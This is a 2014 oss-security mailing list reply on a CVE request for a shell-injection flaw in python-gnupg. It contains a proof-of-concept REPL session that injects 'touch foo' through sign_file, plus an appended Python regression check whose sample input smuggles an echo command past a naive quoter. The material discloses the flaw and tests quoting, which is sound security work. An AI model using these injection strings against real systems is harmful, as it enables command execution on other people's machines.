Date: Tue, 4 Feb 2014 23:27:34 +1300
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gnupg
>>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
>>>
$ ls foo
foo

- Matthew
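
Added example, not part of the original message and not python-gnupg's code: a regression check for a shell-quoting helper that tokenizes the quoted string with `shlex` (nothing is executed) and confirms the argument comes back as exactly one word. `naive_quote`, `round_trips`, `find_breaking_inputs`, the `gpg --passphrase` prefix and the sample values are constructed for illustration; `naive_quote` is a hypothetical quoter that escapes double quotes but not backslashes, the kind of gap reported above.

```python
import shlex

# Constructed sample inputs (not taken from any real system).
SAMPLES = [
    "plain",
    "it's",
    'say "hi"',
    'pa\\"; echo INJECTED #',   # backslash immediately before a double quote
]


def naive_quote(value):
    """Hypothetical quoter (an assumption, not python-gnupg's shell_quote):
    wraps the value in double quotes and escapes only the double quote."""
    return '"' + value.replace('"', '\\"') + '"'


def round_trips(quoter, value):
    """Return True if POSIX-style tokenization of the built command line
    yields the original value as exactly one argument.

    shlex.split models word splitting and quote removal only; it does not
    model $ or backtick expansion, so passing this check is necessary but
    not sufficient for a quoter that targets double-quoted context."""
    command = "gpg --passphrase " + quoter(value)
    try:
        words = shlex.split(command)
    except ValueError:
        # Unbalanced quotes: the value broke out of its quoting.
        return False
    return words == ["gpg", "--passphrase", value]


def find_breaking_inputs(quoter, values):
    """List every value that does not survive quoting as a single word."""
    return [v for v in values if not round_trips(quoter, v)]


if __name__ == "__main__":
    for name, quoter in (("naive_quote", naive_quote),
                         ("shlex.quote", shlex.quote)):
        print(name, "breaks on:", find_breaking_inputs(quoter, SAMPLES))
```

`shlex.quote` is the Python 3.3+ name (`pipes.quote` on Python 2); passing an argument list to `subprocess` without `shell=True` removes the need for quoting altogether.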
